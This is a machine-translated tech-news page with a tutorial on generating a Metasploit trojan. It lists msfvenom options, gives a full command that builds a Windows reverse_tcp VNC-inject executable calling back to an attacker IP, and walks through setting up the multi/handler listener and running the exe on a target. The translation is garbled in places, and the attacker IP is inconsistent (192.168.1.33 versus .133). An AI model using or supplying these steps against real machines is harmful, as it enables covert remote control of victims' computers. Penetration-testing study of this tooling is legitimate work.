In addition to Weibo, there is also WeChat
Please pay attention
WeChat public account
Shulou
2025-02-01 Update From: SLTechnology News&Howtos shulou NAV: SLTechnology News&Howtos > Internet Technology >
Share
Shulou(Shulou.com)06/02 Report--
Metasploit Trojan horse generation principle is what, many novices are not very clear about this, in order to help you solve this problem, the following editor will explain in detail for you, people with this need can come to learn, I hope you can gain something.
First, the generation method: using the msfvenom module in the msf module
Principle: msfvenom is a combination of msfpayload and msfencode. Trojan programs are generated by msfvenom, executed on the target machine, and monitored online locally.
3. The msfvenom command line options are as follows
-p,-- payload specifies the payload (attack load) to be used. If you need to use a custom payload, use & # 039; or stdin to specify
-l,-- list [module_type] lists all available resources for the specified module. Module types include: payloads, encoders, nops, all
-n,-- nopsled specifies a NOP sliding length for payload in advance
-f,-- format specify the output format (use-- help-formats to get a list of output formats supported by msf)
-e,-- encoder [encoder] specifies the encoder (encoder) to be used
-a,-- arch specifies the target schema of the payload
-- platform specifies the target platform for payload
-s,-- space sets the maximum length of the effective attack load
-b,-- bad-chars sets the circumvention character set, for example: & # 039;\ x00\ xff'
-I,-- iterations specifies the number of payload encodings
-c,-- add-code specifies an additional win32 shellcode file
-x,-- template specifies a custom executable file as the template
-k,-- keep protects the action of the template program, and the injected payload runs as a new process
-- payload-options lists the standard options for payload
-o,-- out saves payload
-v,-- var-name specifies a custom variable to determine the output format
-- shellest minimizes generation of payload
-h,-- help view help options
-- help-formats views the list of output formats supported by msf
IV. Method of use
1. Msfvenom-- the platform supported by list platforms display
2. Msfvenom-- the format supported by list formats display
3. Msfvenom-- the architecture supported by list archs display
4. Msfvenom-Encoder supported by list encoders display
5. Generate Trojan horse
Target host: 192.168.1.129 (win7 x64)
Attack aircraft: 192.168.1.33
Attack port: 12121
Generate Trojan horse: msfvenom-- arch x64-- platform windows-p windows/x64/vncinject/reverse_tcp lhost=192.168.1.133 lport=12121-f exe-o / root/win64.exe
6. Enter the listening module use exploit/multi/handler
7. Set payload bounce set payload windows/x64/vncinject/reverse_tcp
8. Check the parameters to be set: show options
9. Set up the attack plane ip:set lhost 192.168.1.133
10. Set attack port: set lport 12121
11. Upload the generated exe file to the target host and run it
12. Run attack
13. The monitoring screen of the attack plane
14. Target host screen
Is it helpful for you to read the above content? If you want to know more about the relevant knowledge or read more related articles, please follow the industry information channel, thank you for your support.
Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.
Views: 0
*The comments in the above article only represent the author's personal views and do not represent the views and positions of this website. If you have more insights, please feel free to contribute and share.
Continue with the installation of the previous hadoop.First, install zookooper1. Decompress zookoope
"Every 5-10 years, there's a rare product, a really special, very unusual product that's the most un
© 2024 shulou.com SLNews company. All rights reserved.